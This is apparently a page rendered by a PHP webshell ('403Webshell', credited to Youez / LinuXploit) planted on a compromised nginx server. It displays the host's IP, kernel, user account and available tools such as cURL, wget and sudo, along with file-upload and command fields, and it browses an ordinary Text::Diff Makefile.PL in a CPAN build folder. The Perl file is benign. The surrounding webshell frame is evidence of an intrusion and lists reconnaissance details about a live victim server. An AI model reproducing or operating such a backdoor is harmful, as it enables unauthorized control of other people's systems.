403Webshell
Server IP : 164.138.27.172  /  Your IP : 216.73.216.143
Web Server : nginx/1.27.4
System : Linux cookingdream 6.8.0-124-generic #124-Ubuntu SMP PREEMPT_DYNAMIC Tue May 26 13:00:45 UTC 2026 x86_64
User : www-adm ( 1001)
PHP Version : 8.3.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/jonasn/.cpan/build/Text-Diff-1.45-0/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/jonasn/.cpan/build/Text-Diff-1.45-0/Makefile.PL
use strict;

BEGIN {
    require 5.005_03;
}
use ExtUtils::MakeMaker;

my $mm_ver = $ExtUtils::MakeMaker::VERSION;
if ($mm_ver =~ /_/) { # dev version
    $mm_ver = eval $mm_ver;
    die $@ if $@;
}

WriteMakefile(
    NAME         => 'Text::Diff',
    ABSTRACT     => 'Perform diffs on files and record sets',
    VERSION_FROM => 'lib/Text/Diff.pm',
    PREREQ_PM    => {
        'Exporter'        => 0,
        'Algorithm::Diff' => '1.19',
    },
    ( $] >= 5.005 ? ( AUTHOR => 'Adam Kennedy <adamk@cpan.org>', ) : () ),
    (
        $ExtUtils::MakeMaker::VERSION ge '6.30_00' ? ( LICENSE => 'perl', ) : ()
    ),
    (
        $ExtUtils::MakeMaker::VERSION ge '6.46'
        ? ( META_MERGE => { build_requires => { Test => 0 } } )
        : ()
    ),
    META_MERGE =>
      { resources => {
           repository => 'https://github.com/neilbowers/Text-Diff'
        }
      },

    ($mm_ver >= 6.48
        ? (MIN_PERL_VERSION => 5.006)
        : ()
    ),

);

Youez - 2016 - github.com/yon3zu
LinuXploit